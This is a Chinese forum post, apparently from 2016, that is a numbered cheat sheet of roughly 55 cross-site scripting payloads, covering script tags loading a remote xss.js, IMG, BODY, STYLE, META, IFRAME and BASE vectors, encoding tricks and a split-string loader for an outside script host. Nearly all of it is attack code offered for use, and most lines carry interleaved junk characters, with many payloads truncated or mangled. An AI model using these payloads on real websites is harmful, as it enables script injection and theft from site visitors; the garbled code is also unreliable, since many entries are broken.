(1)普通的XSS JavaScript注入9 s7 |4 o5 Q0 d( F' A5 x' O# k
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
) k4 V! Q% o1 m# `' h; a(99)另类弹框
+ ~/ J' {1 M6 r<q/oncut=alert()>1
9 K2 I9 R3 W6 @6 ]- A' N/ s<s/onclick=alert()>b
, s7 F) Y; u/ H) Q/ X <XSS=" onclick="alert(1)//">clickme</SSX="># p% g+ |) p6 J
<zzz onclick=alert`1`>clickme</zzz>
) Q7 V) t, [5 W4 ? c# c <a onclick=alert`1`>clickme</a>/ e, ~* i) A, A& m
<a=">clickme</a=">
& A: d' ]0 C1 a5 r<a=">clickme</a>
& Z8 o4 x! U7 y) Q<z=">clickme</z=">* `5 ~0 V" X& r1 P/ r
<z onclick=alert`1`>clickme</z>, q2 J/ D% z$ i! V1 _
" c7 U: v) R9 O(2)IMG标签XSS使用JavaScript命令* `7 l. R: n, ~8 S$ r
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>$ O; _; O; R. C8 x' c, O: t
) }' b8 z* b# {6 I% d, I
(3)IMG标签无分号无引号" B0 m; S Q" [4 r% X
<IMG SRC=javascript:alert(‘XSS’)>* Q( P6 t+ C* Y0 d' D3 G( K2 r( ]
" J9 N7 q9 V6 o5 C7 @' X$ U
(4)IMG标签大小写不敏感
: e. _4 P- U6 C( K! [<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
4 K: t0 n& u+ T! x; A) h: Z |9 o- ?7 D0 C4 x
(5)HTML编码(必须有分号)
2 h6 U( w9 _/ ~. n6 R/ H4 C) [<IMG SRC=javascript:alert(“XSS”)> f9 C+ f- W2 n0 A1 U$ S: j9 s2 D
7 h6 [" P0 h$ m9 B(6)修正缺陷IMG标签
& ]3 V' @. v" n, [3 g o<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
+ {+ y" S6 d1 J; @4 B; J
) o: f, w5 D; p. b- v6 V(7)formCharCode标签(计算器): q8 e$ V3 _: P& [6 z
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
5 h- V6 E& [, d7 b& G5 i7 f4 Q" z. F6 }5 f: w; s+ {
(8)UTF-8的Unicode编码(计算器)" J/ s! ^. R/ `" I1 P2 j1 {
<IMG SRC=jav..省略..S')>, V# r% |4 F: Q2 J
8 |1 i2 t X$ ^/ [
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)7 R& p/ ?+ c1 _0 k
<IMG SRC=jav..省略..S')>
6 Q- O) c7 J5 U. E1 }6 d6 e( ~2 q/ m- _9 n9 q: s
(10)十六进制编码也是没有分号(计算器)8 u" }8 d- C0 Q0 N |8 P
<IMG SRC=\'#\'" /span>5 N; n% X" e# Y# E/ C! o
# v1 ]7 d- p" z+ C& P! n+ Q
(11)嵌入式标签,将Javascript分开
) A3 }& Z- O f, `<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>; E/ G& }) j+ Q/ I0 j$ j
( z6 ~: r) t- `3 f2 s1 E" x$ Q(12)嵌入式编码标签,将Javascript分开9 j5 b) ]* E! b0 S& D" Z
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>+ O: d* f; L ]) v1 \" b" h
9 J# K5 Z3 u) i( r( ~, h
(13)嵌入式换行符
Q1 y6 Y' m# g) V2 K4 q' J<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>" J9 B: F' ~' M$ |
* h& t$ I4 S, c" m6 l1 \(14)嵌入式回车
6 B- }/ Z* X1 a+ ?0 B, f: h<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
( Z* p8 \, x7 d: {! n% O
3 v, m7 m3 F, ?1 n/ `( \(15)嵌入式多行注入JavaScript,这是XSS极端的例子1 n/ f, ^7 g. w( b, j: g! c
<IMG SRC=\'#\'" /span>
+ q) t \& I* c6 F/ [6 f1 Z/ P+ I& O1 Z" B
(16)解决限制字符(要求同页面)
4 M2 O. b) S. O0 h! J<script>z=’document.’</script>
+ V$ |3 t3 i! V! `, b<script>z=z+’write(“‘</script>7 v" p- r3 a; E9 a4 J6 n
<script>z=z+’<script’</script>" q4 y6 n+ I X
<script>z=z+’ src=ht’</script>
( l) y8 m- n* c+ @8 P9 P. q<script>z=z+’tp://ww’</script>: E0 t! F* q) a, z
<script>z=z+’w.shell’</script>7 p7 k0 x8 R7 l% f* M, U
<script>z=z+’.net/1.’</script>) a' M T1 U- I+ H
<script>z=z+’js></sc’</script>( j6 P" U. _- v# l3 s: K
<script>z=z+’ript>”)’</script>
% K, l- }) c, B- K& F<script>eval_r(z)</script>$ Y. y. m, \! J( G6 n
' V( a. V# q6 m$ g9 B
(17)空字符8 |& Q, J3 ?* n& Y1 M
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
: l8 t7 N+ d2 @' S9 h" U! o7 T u8 M# u8 I+ f+ a
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
& ]9 G4 `0 w3 j5 ?perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
3 G; R0 F, `# w3 ~9 ~! k5 G7 i6 J2 P+ y |2 ~0 T: Z
(19)Spaces和meta前的IMG标签+ ?8 e3 |6 z! a* b% r
<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>
1 z- a1 D$ s' z, h1 b$ W( b2 @% p- E
(20)Non-alpha-non-digit XSS: M, ?' w; r1 Y. y6 p! Q- [
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
9 ? V7 C5 e$ ~- [% N! V! P t' _$ U6 q |3 w; f# N
(21)Non-alpha-non-digit XSS to 29 C7 m! n2 [9 X; A4 c
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>; {) m' W& Z2 o0 `- Y7 N& \
) [" b# v6 m% J7 {(22)Non-alpha-non-digit XSS to 3
. k3 q8 C( J# ^6 J: o, Y, X<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
1 `6 A& F$ Z: r, @( U8 w( ^7 R
5 @& V) f5 `' z. Y+ p# [, q# H(23)双开括号
" K+ a. @# `7 K. n+ T) T<<SCRIPT>alert(“XSS”);//<</SCRIPT>
4 D v1 Z; ]3 B! R* R3 E( M/ p5 c8 J. Q0 k' {8 t, ~0 _; c# A
(24)无结束脚本标记(仅火狐等浏览器)
$ o$ o& j: M, A) Q. \/ ?0 o" K7 m( Z<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
2 ~; `; f5 \3 i8 ^" N7 U _: S8 l6 N: V- g+ k3 k
(25)无结束脚本标记2* E0 P0 i% q! Z+ g g3 Q' g
<SCRIPT SRC=//3w.org/XSS/xss.js>5 {' Y' z& ]6 q ^( g+ r P
2 x* J5 `9 m' C5 {) N3 K/ @(26)半开的HTML/JavaScript XSS
f0 B' h3 x9 a O<IMG SRC=\'#\'" /span>
5 R6 W9 g: b4 k8 w# {
3 J+ Z) T! F% E' V6 _(27)双开角括号
# l& e' y3 [- J7 O<iframe src=http://3w.org/XSS.html <
" `$ \4 M: E. f1 v$ u
: @. R! L; b2 Y(28)无单引号 双引号 分号
* k3 N, w/ o7 q5 a2 [( v& |<SCRIPT>a=/XSS/+ T1 _6 |& V, K$ L; U2 E* i% H
alert(a.source)</SCRIPT>
8 J" u |$ O, T: W; V3 M7 O; M* Q
- {' }9 z; ]1 i5 M(29)换码过滤的JavaScript
# L1 y. Z: d, D* C% @, U\”;alert(‘XSS’);//
0 v l6 f; G x: R1 n& N% M! v) P& i! |( S
(30)结束Title标签$ z+ e! F Y3 R- A
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
6 r% X# ^; y$ [% b. j$ T l' ~8 H
. G0 w" k! g1 M(31)Input Image
4 g" o# w" u6 G8 ?2 w9 k/ ~# V<INPUT SRC=\'#\'" /span>! b2 L4 \1 z. x( r% [* s
8 u6 y! W: x$ v5 I7 A% f' _8 V8 ^0 W
(32)BODY Image
7 ]. I. V0 R+ k: q2 s<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
. i3 f8 Q$ o4 _# O) r; L8 J: o; N+ F+ ]0 E; d
(33)BODY标签" v* k2 o8 b+ e. L9 E2 ?
<BODY(‘XSS’)>2 P3 x+ q, _/ c8 m$ X
8 O% w: [4 c( J(34)IMG Dynsrc
) l$ q s2 g! r, d1 C; U4 c* ^, g<IMG DYNSRC=\'#\'" /span>
8 I' N- S& M! U8 q, p& G
4 T4 T2 T9 [4 N4 C; B P(35)IMG Lowsrc
7 Q0 C9 d) M+ t5 M% u<IMG LOWSRC=\'#\'" /span>
# O% L% j& d; ~. w/ _: S9 e& t" W! | [( O J
(36)BGSOUND
0 }' A6 u$ O. }. a; F$ X<BGSOUND SRC=\'#\'" /span>
J5 t. s% d0 E: a2 M" Q/ b0 y6 d( Q% \
(37)STYLE sheet
! @# Y, `6 ^! N<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>3 ]/ G# x+ x7 G0 R9 i4 x
* u0 a. u# u3 K% @1 [& q(38)远程样式表
* O0 i; `1 j$ H( Y% ~ `<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
8 b$ a2 z* X9 }2 ~2 q
% e1 \: {( U' e) U9 G& x(39)List-style-image(列表式)- L5 X4 U' ]& f6 Q5 @
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS( X' s7 } ^3 r* M
( N e& O4 X; ^& W. z$ z' s(40)IMG VBscript2 r! Y: Y; n. u6 x5 H
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS; n* l* m3 M: Q4 r7 ~$ p) t( F# a' P a
1 R) n O" B2 l$ m2 a% u
(41)META链接url
( p, w& w* z* d) ?<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
, g1 P! M) i6 b. z& v4 j7 r* P6 y% F5 x0 ]7 f+ F
(42)Iframe: ^7 O& Y: r K
<IFRAME SRC=\'#\'" /IFRAME>
3 t y: B+ K9 r5 W" N7 l: c; q" v
3 Q: m( R- j0 ^(43)Frame
+ z5 x7 f- m& w9 g8 L<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
- `$ k( `* s0 c* j- f- E8 n1 d8 S# D, }6 t" T
(44)Table
6 l [; c3 K7 |- p% m+ L0 r4 w<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>* o7 s# Y+ c1 M, h$ R5 ?4 d
- j! Z0 N: L/ H, o. n- l' S
(45)TD
0 v; P5 b0 x8 L9 q0 f( e3 Q<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
) D/ C, x4 j: h$ `+ z: }0 h& c
( G" `3 j7 {5 b5 b, C& w(46)DIV background-image
% @9 s/ f9 z( @<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
. f# H5 z) U0 _ I0 E
0 i C& t- M, p' q(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)" f \# _0 h" k# h. M% Q
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>3 p* K T5 K) ]! ]: [# u# `% ~
8 ?3 _) H: W& S$ H- ^' P(48)DIV expression# o7 U. p! q) Q
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>1 Z- o6 D8 H. U) @- i
5 p% m8 F8 h c: j5 ^1 F
(49)STYLE属性分拆表达
( |( [% W( C/ i+ i) e<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
: f* R- p% y, P
& |4 g+ _! E2 U9 A(50)匿名STYLE(组成:开角号和一个字母开头)
! f; g# u3 k2 D% z<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
8 t* n8 j0 J+ b* [" k; V* s4 W% z" S. W
(51)STYLE background-image
2 P5 l' _4 q4 I) y; m<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>! W2 P; I# \& }* t
& j$ k, a k' K1 w(52)IMG STYLE方式
9 F( d3 ^" _4 Rexppression(alert(“XSS”))’>
. G) S0 j/ K8 m- A4 G: K* B7 Y3 g- q: g/ a* t& P
(53)STYLE background
; f0 x5 H$ J' \- R<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
2 R$ ?5 w( x7 b3 P# ~! v% E2 i5 D+ x2 P# B. e
(54)BASE
9 ^# u. T7 v+ G, b<BASE HREF=”javascript:alert(‘XSS’);//”>
4 Y+ e. z2 z7 {9 x' [; l0 k' H4 m: ^; i; }
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS' r) T; U& u6 x& `4 z. u/ o) z7 E6 y
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>. @: K1 y+ B3 q9 z0 j; Q4 p1 ~
|
发表于 2016-4-28 10:06:15
收藏
支持
反对